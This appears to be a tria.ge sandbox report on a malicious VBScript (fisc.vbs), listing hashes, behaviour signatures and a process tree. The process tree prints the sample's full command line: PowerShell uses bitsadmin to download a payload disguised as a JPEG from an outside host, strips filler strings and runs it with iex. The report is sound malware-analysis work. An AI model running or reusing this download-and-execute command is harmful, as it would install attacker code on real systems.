Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

01/06/2023, 13:52

230601-q6laesee79 6

01/06/2023, 13:51

230601-q6be8aeh6y 6

01/06/2023, 13:49

230601-q4w9xaeh6v 6

01/06/2023, 13:48

230601-q4bcfaeh51 6

01/06/2023, 13:45

230601-q2vy3aee58 6

01/06/2023, 13:42

230601-qz6msaeh5t 7

25/05/2022, 10:04

220525-l3xrtsdfbm 7

Analysis

  • max time kernel
    55s
  • max time network
    63s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01/06/2023, 13:42

General

  • Target

    fisc.vbs

  • Size

    607B

  • MD5

    7e9280027235462727a9a351429725c6

  • SHA1

    380f1b3eeb2779a4359e4ca52471273983ed684c

  • SHA256

    11a9b5a24b628be56d2d2bedf1ed71f05114c2f670cd1814ff8f8ff222cd801a

  • SHA512

    7e31dcff6590b79476bb9bedd73145b9acafea62202d8defdd12608eae4cf727dce8781b83cd14d51432f2989bc6376c0a5bb8a114397c504a1ea4d519b4e060

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fisc.vbs"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2476
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c powershell -c "&{bitsadmin /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg; $ah=gc C:\Users\Admin\AppData\Roaming\production.jpeg; $ah -replace 'rfkvkhyy|wvgpmnbgx|xhbtegpohq|evvdwlxcd|gisofqvjp|edvdpyzc|uqbykfuhv' |iex }"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -c "&{bitsadmin /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg; $ah=gc C:\Users\Admin\AppData\Roaming\production.jpeg; $ah -replace 'rfkvkhyy|wvgpmnbgx|xhbtegpohq|evvdwlxcd|gisofqvjp|edvdpyzc|uqbykfuhv' |iex }"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1452
        • C:\Windows\system32\bitsadmin.exe
          "C:\Windows\system32\bitsadmin.exe" /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg
          4⤵
          • Download via BitsAdmin
          PID:4688
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:700
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k localservice -s fdPHost
      1⤵
        PID:5020

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q5pwosvi.noi.ps1

        Filesize

        1B

        MD5

        c4ca4238a0b923820dcc509a6f75849b

        SHA1

        356a192b7913b04c54574d18c28d46e6395428ab

        SHA256

        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

        SHA512

        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      • C:\Users\Public\Downloads\vcmeunewnaj.lnk

        Filesize

        652B

        MD5

        671edceeceed4b8d01725b17bb334014

        SHA1

        f1b1e5909d6cb622c6133c92c775e022c7fb0edb

        SHA256

        93d8ed1c1a490a5384e0d19a399e95b60f67880af242cf77955e8f53202adcf8

        SHA512

        1ff5f1549a01cb21e7ab285acd9c4fea328693a66375f5effbd89f577c4557b4a7eb4722de8d084b46012fce3d05bfe2f42ba639f895e2d089bc52db517d8722

      • memory/1452-154-0x0000029527F10000-0x0000029527F32000-memory.dmp

        Filesize

        136KB

      • memory/1452-157-0x00000295280C0000-0x0000029528136000-memory.dmp

        Filesize

        472KB

      • memory/1452-168-0x0000029527DD0000-0x0000029527DE0000-memory.dmp

        Filesize

        64KB

      • memory/1452-169-0x0000029527DD0000-0x0000029527DE0000-memory.dmp

        Filesize

        64KB

      • memory/1452-170-0x0000029527DD0000-0x0000029527DE0000-memory.dmp

        Filesize

        64KB